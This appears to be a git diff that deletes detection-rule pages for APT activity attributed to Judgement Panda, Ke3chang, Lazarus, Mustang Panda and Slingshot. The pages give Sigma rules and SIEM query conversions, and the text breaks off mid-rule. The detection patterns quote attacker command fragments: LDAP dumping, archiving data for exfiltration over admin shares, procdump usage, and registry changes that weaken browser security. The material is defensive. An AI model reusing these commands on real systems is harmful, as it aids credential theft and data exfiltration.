-| **Trigger**              | <ul><li>[T1098: Account Manipulation](../Triggers/T1098.md)</li><li>[T1560: Archive Collected Data](../Triggers/T1560.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/](https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0010</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Judgement Panda Exfil Activity
-id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
-description: Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike
-references:
-    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
-author: Florian Roth
-date: 2019/02/21
-tags:
-    - attack.lateral_movement
-    - attack.g0010
-    - attack.credential_access
-    - attack.t1098
-    - attack.exfiltration
-    - attack.t1002
-    - attack.t1560
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine:
-            - '*\ldifde.exe -f -n *'
-            - '*\7za.exe a 1.7z *'
-            - '* eprod.ldf'
-            - '*\aaaa\procdump64.exe*'
-            - '*\aaaa\netsess.exe*'
-            - '*\aaaa\7za.exe*'
-            - '*copy .\1.7z \\*'
-            - '*copy \\client\c$\aaaa\\*'
-    selection2:
-        Image: C:\Users\Public\7za.exe
-    condition: selection1 or selection2
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*\\ldifde.exe -f -n .*" -or $_.message -match "CommandLine.*.*\\7za.exe a 1.7z .*" -or $_.message -match "CommandLine.*.* eprod.ldf" -or $_.message -match "CommandLine.*.*\\aaaa\\procdump64.exe.*" -or $_.message -match "CommandLine.*.*\\aaaa\\netsess.exe.*" -or $_.message -match "CommandLine.*.*\\aaaa\\7za.exe.*" -or $_.message -match "CommandLine.*.*copy .\\1.7z \\.*" -or $_.message -match "CommandLine.*.*copy \\client\\c$\\aaaa\\.*") -or $_.message -match "Image.*C:\\Users\\Public\\7za.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*\\ldifde.exe\ \-f\ \-n\ * OR *\\7za.exe\ a\ 1.7z\ * OR *\ eprod.ldf OR *\\aaaa\\procdump64.exe* OR *\\aaaa\\netsess.exe* OR *\\aaaa\\7za.exe* OR *copy\ .\\1.7z\ \\* OR *copy\ \\client\\c$\\aaaa\\*) OR winlog.event_data.Image:"C\:\\Users\\Public\\7za.exe")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/03e2746e-2b31-42f1-ab7a-eb39365b2422 <<EOF
-{
-  "metadata": {
-    "title": "Judgement Panda Exfil Activity",
-    "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.g0010",
-      "attack.credential_access",
-      "attack.t1098",
-      "attack.exfiltration",
-      "attack.t1002",
-      "attack.t1560"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*\\\\ldifde.exe\\ \\-f\\ \\-n\\ * OR *\\\\7za.exe\\ a\\ 1.7z\\ * OR *\\ eprod.ldf OR *\\\\aaaa\\\\procdump64.exe* OR *\\\\aaaa\\\\netsess.exe* OR *\\\\aaaa\\\\7za.exe* OR *copy\\ .\\\\1.7z\\ \\\\* OR *copy\\ \\\\client\\\\c$\\\\aaaa\\\\*) OR winlog.event_data.Image:\"C\\:\\\\Users\\\\Public\\\\7za.exe\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*\\\\ldifde.exe\\ \\-f\\ \\-n\\ * OR *\\\\7za.exe\\ a\\ 1.7z\\ * OR *\\ eprod.ldf OR *\\\\aaaa\\\\procdump64.exe* OR *\\\\aaaa\\\\netsess.exe* OR *\\\\aaaa\\\\7za.exe* OR *copy\\ .\\\\1.7z\\ \\\\* OR *copy\\ \\\\client\\\\c$\\\\aaaa\\\\*) OR winlog.event_data.Image:\"C\\:\\\\Users\\\\Public\\\\7za.exe\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Judgement Panda Exfil Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*\\ldifde.exe \-f \-n * *\\7za.exe a 1.7z * * eprod.ldf *\\aaaa\\procdump64.exe* *\\aaaa\\netsess.exe* *\\aaaa\\7za.exe* *copy .\\1.7z \\* *copy \\client\\c$\\aaaa\\*) OR Image:"C\:\\Users\\Public\\7za.exe")
-```
-
-
-### splunk
-    
-```
-((CommandLine="*\\ldifde.exe -f -n *" OR CommandLine="*\\7za.exe a 1.7z *" OR CommandLine="* eprod.ldf" OR CommandLine="*\\aaaa\\procdump64.exe*" OR CommandLine="*\\aaaa\\netsess.exe*" OR CommandLine="*\\aaaa\\7za.exe*" OR CommandLine="*copy .\\1.7z \\*" OR CommandLine="*copy \\client\\c$\\aaaa\\*") OR Image="C:\\Users\\Public\\7za.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine IN ["*\\ldifde.exe -f -n *", "*\\7za.exe a 1.7z *", "* eprod.ldf", "*\\aaaa\\procdump64.exe*", "*\\aaaa\\netsess.exe*", "*\\aaaa\\7za.exe*", "*copy .\\1.7z \\*", "*copy \\client\\c$\\aaaa\\*"] OR Image="C:\\Users\\Public\\7za.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*\ldifde\.exe -f -n .*|.*.*\7za\.exe a 1\.7z .*|.*.* eprod\.ldf|.*.*\aaaa\procdump64\.exe.*|.*.*\aaaa\netsess\.exe.*|.*.*\aaaa\7za\.exe.*|.*.*copy \.\1\.7z \\.*|.*.*copy \\client\c\$\aaaa\\.*)|.*C:\Users\Public\7za\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_ke3chang_regadd.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_ke3chang_regadd.md
deleted file mode 100644
index f852c78..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_ke3chang_regadd.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Ke3chang Registry Key Modifications       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Registry modifcations performaed by Ke3chang malware in campaigns running in 2019 and 2020 |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Will need to be looked for combinations of those processes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf](https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf)</li><li>[https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/](https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/)</li></ul>  |
-| **Author**               | Markus Neis, Swisscom |
-| Other Tags           | <ul><li>attack.g0004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Ke3chang Registry Key Modifications
-id: 7b544661-69fc-419f-9a59-82ccc328f205
-status: experimental
-description: Detects Registry modifcations performaed by Ke3chang malware in campaigns running in 2019 and 2020
-references:
-    - https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
-    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
-tags:
-    - attack.g0004
-    - attack.t1059
-    - attack.t1089
-author: Markus Neis, Swisscom 
-date: 2020/06/18
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys. 
-        # Setting these registry keys is unique to the Ke3chang and TidePool malware families.
-        # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
-        # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
-        # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden
-        CommandLine|contains:
-            - '-Property DWORD -name DisableFirstRunCustomize -value 2 -Force'
-            - '-Property String -name Check_Associations -value'
-            - '-Property DWORD -name IEHarden -value 0 -Force'         
-    condition: selection1
-falsepositives:
-    - Will need to be looked for combinations of those processes
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*-Property DWORD -name DisableFirstRunCustomize -value 2 -Force.*" -or $_.message -match "CommandLine.*.*-Property String -name Check_Associations -value.*" -or $_.message -match "CommandLine.*.*-Property DWORD -name IEHarden -value 0 -Force.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\-Property\ DWORD\ \-name\ DisableFirstRunCustomize\ \-value\ 2\ \-Force* OR *\-Property\ String\ \-name\ Check_Associations\ \-value* OR *\-Property\ DWORD\ \-name\ IEHarden\ \-value\ 0\ \-Force*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7b544661-69fc-419f-9a59-82ccc328f205 <<EOF
-{
-  "metadata": {
-    "title": "Ke3chang Registry Key Modifications",
-    "description": "Detects Registry modifcations performaed by Ke3chang malware in campaigns running in 2019 and 2020",
-    "tags": [
-      "attack.g0004",
-      "attack.t1059",
-      "attack.t1089"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\-Property\\ DWORD\\ \\-name\\ DisableFirstRunCustomize\\ \\-value\\ 2\\ \\-Force* OR *\\-Property\\ String\\ \\-name\\ Check_Associations\\ \\-value* OR *\\-Property\\ DWORD\\ \\-name\\ IEHarden\\ \\-value\\ 0\\ \\-Force*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\-Property\\ DWORD\\ \\-name\\ DisableFirstRunCustomize\\ \\-value\\ 2\\ \\-Force* OR *\\-Property\\ String\\ \\-name\\ Check_Associations\\ \\-value* OR *\\-Property\\ DWORD\\ \\-name\\ IEHarden\\ \\-value\\ 0\\ \\-Force*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Ke3chang Registry Key Modifications'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\-Property DWORD \-name DisableFirstRunCustomize \-value 2 \-Force* *\-Property String \-name Check_Associations \-value* *\-Property DWORD \-name IEHarden \-value 0 \-Force*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*-Property DWORD -name DisableFirstRunCustomize -value 2 -Force*" OR CommandLine="*-Property String -name Check_Associations -value*" OR CommandLine="*-Property DWORD -name IEHarden -value 0 -Force*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*-Property DWORD -name DisableFirstRunCustomize -value 2 -Force*", "*-Property String -name Check_Associations -value*", "*-Property DWORD -name IEHarden -value 0 -Force*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*-Property DWORD -name DisableFirstRunCustomize -value 2 -Force.*|.*.*-Property String -name Check_Associations -value.*|.*.*-Property DWORD -name IEHarden -value 0 -Force.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_lazarus_session_highjack.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_lazarus_session_highjack.md
deleted file mode 100644
index 9dd1d9d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_lazarus_session_highjack.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Lazarus Session Highjacker       |
-|:-------------------------|:------------------|
-| **Description**          | Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf)</li></ul>  |
-| **Author**               | Trent Liffick (@tliffick) |
-| Other Tags           | <ul><li>attack.t1036.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Lazarus Session Highjacker
-id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
-description: Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)
-status: experimental
-references:
-    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-    - attack.t1036.005
-author: Trent Liffick (@tliffick)
-date: 2020/06/03
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: 
-            - '*\mstdc.exe'
-            - '*\gpvc.exe'
-    filter:
-        Image:
-            - 'C:\Windows\System32\\*'
-            - 'C:\Windows\SysWOW64\\*'
-    condition: selection and not filter
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\mstdc.exe" -or $_.message -match "Image.*.*\\gpvc.exe") -and  -not (($_.message -match "Image.*C:\\Windows\\System32\\.*" -or $_.message -match "Image.*C:\\Windows\\SysWOW64\\.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\mstdc.exe OR *\\gpvc.exe) AND (NOT (winlog.event_data.Image.keyword:(C\:\\Windows\\System32\\* OR C\:\\Windows\\SysWOW64\\*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3f7f5b0b-5b16-476c-a85f-ab477f6dd24b <<EOF
-{
-  "metadata": {
-    "title": "Lazarus Session Highjacker",
-    "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036",
-      "attack.t1036.005"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\mstdc.exe OR *\\\\gpvc.exe) AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\mstdc.exe OR *\\\\gpvc.exe) AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Lazarus Session Highjacker'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\mstdc.exe *\\gpvc.exe) AND (NOT (Image.keyword:(C\:\\Windows\\System32\\* C\:\\Windows\\SysWOW64\\*))))
-```
-
-
-### splunk
-    
-```
-((Image="*\\mstdc.exe" OR Image="*\\gpvc.exe") NOT ((Image="C:\\Windows\\System32\\*" OR Image="C:\\Windows\\SysWOW64\\*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\mstdc.exe", "*\\gpvc.exe"]  -(Image IN ["C:\\Windows\\System32\\*", "C:\\Windows\\SysWOW64\\*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\mstdc\.exe|.*.*\gpvc\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*C:\Windows\System32\\.*|.*C:\Windows\SysWOW64\\.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_mustangpanda.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_mustangpanda.md
deleted file mode 100644
index 9838b00..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_mustangpanda.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Mustang Panda Dropper       |
-|:-------------------------|:------------------|
-| **Description**          | Detects specific process parameters as used by Mustang Panda droppers |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/](https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/)</li><li>[https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/](https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/)</li><li>[https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations](https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Mustang Panda Dropper
-id: 2d87d610-d760-45ee-a7e6-7a6f2a65de00
-status: experimental
-description: Detects specific process parameters as used by Mustang Panda droppers
-author: Florian Roth
-date: 2019/10/30
-references:
-    - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/
-    - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/
-    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine: 
-            - '*Temp\wtask.exe /create*'
-            - '*%windir:~-3,1%%PUBLIC:~-9,1%*'
-            - '*/E:vbscript * C:\Users\\*.txt" /F'
-            - '*/tn "Security Script *'
-            - '*%windir:~-1,1%*'
-    selection2:
-        Image:
-            - '*Temp\winwsh.exe'
-    condition: 1 of them
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*Temp\\wtask.exe /create.*" -or $_.message -match "CommandLine.*.*%windir:~-3,1%%PUBLIC:~-9,1%.*" -or $_.message -match "CommandLine.*.*/E:vbscript .* C:\\Users\\.*.txt\" /F" -or $_.message -match "CommandLine.*.*/tn \"Security Script .*" -or $_.message -match "CommandLine.*.*%windir:~-1,1%.*") -or ($_.message -match "Image.*.*Temp\\winwsh.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*Temp\\wtask.exe\ \/create* OR *%windir\:\~\-3,1%%PUBLIC\:\~\-9,1%* OR *\/E\:vbscript\ *\ C\:\\Users\\*.txt\"\ \/F OR *\/tn\ \"Security\ Script\ * OR *%windir\:\~\-1,1%*) OR winlog.event_data.Image.keyword:(*Temp\\winwsh.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2d87d610-d760-45ee-a7e6-7a6f2a65de00 <<EOF
-{
-  "metadata": {
-    "title": "Mustang Panda Dropper",
-    "description": "Detects specific process parameters as used by Mustang Panda droppers",
-    "tags": "",
-    "query": "(winlog.event_data.CommandLine.keyword:(*Temp\\\\wtask.exe\\ \\/create* OR *%windir\\:\\~\\-3,1%%PUBLIC\\:\\~\\-9,1%* OR *\\/E\\:vbscript\\ *\\ C\\:\\\\Users\\\\*.txt\\\"\\ \\/F OR *\\/tn\\ \\\"Security\\ Script\\ * OR *%windir\\:\\~\\-1,1%*) OR winlog.event_data.Image.keyword:(*Temp\\\\winwsh.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*Temp\\\\wtask.exe\\ \\/create* OR *%windir\\:\\~\\-3,1%%PUBLIC\\:\\~\\-9,1%* OR *\\/E\\:vbscript\\ *\\ C\\:\\\\Users\\\\*.txt\\\"\\ \\/F OR *\\/tn\\ \\\"Security\\ Script\\ * OR *%windir\\:\\~\\-1,1%*) OR winlog.event_data.Image.keyword:(*Temp\\\\winwsh.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Mustang Panda Dropper'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*Temp\\wtask.exe \/create* *%windir\:\~\-3,1%%PUBLIC\:\~\-9,1%* *\/E\:vbscript * C\:\\Users\\*.txt\" \/F *\/tn \"Security Script * *%windir\:\~\-1,1%*) OR Image.keyword:(*Temp\\winwsh.exe))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*Temp\\wtask.exe /create*" OR CommandLine="*%windir:~-3,1%%PUBLIC:~-9,1%*" OR CommandLine="*/E:vbscript * C:\\Users\\*.txt\" /F" OR CommandLine="*/tn \"Security Script *" OR CommandLine="*%windir:~-1,1%*") OR (Image="*Temp\\winwsh.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine IN ["*Temp\\wtask.exe /create*", "*%windir:~-3,1%%PUBLIC:~-9,1%*", "*/E:vbscript * C:\\Users\\*.txt\" /F", "*/tn \"Security Script *", "*%windir:~-1,1%*"] OR Image IN ["*Temp\\winwsh.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*Temp\wtask\.exe /create.*|.*.*%windir:~-3,1%%PUBLIC:~-9,1%.*|.*.*/E:vbscript .* C:\Users\\.*\.txt" /F|.*.*/tn "Security Script .*|.*.*%windir:~-1,1%.*)|.*(?:.*.*Temp\winwsh\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_slingshot.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_slingshot.md
deleted file mode 100644
index 01d5078..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_slingshot.md
+++ /dev/null
@@ -1,268 +0,0 @@
-| Title                    | Defrag Deactivation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://securelist.com/apt-slingshot/84312/](https://securelist.com/apt-slingshot/84312/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0111</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Defrag Deactivation
-id: 958d81aa-8566-4cea-a565-59ccd4df27b0
-author: Florian Roth
-date: 2019/03/04
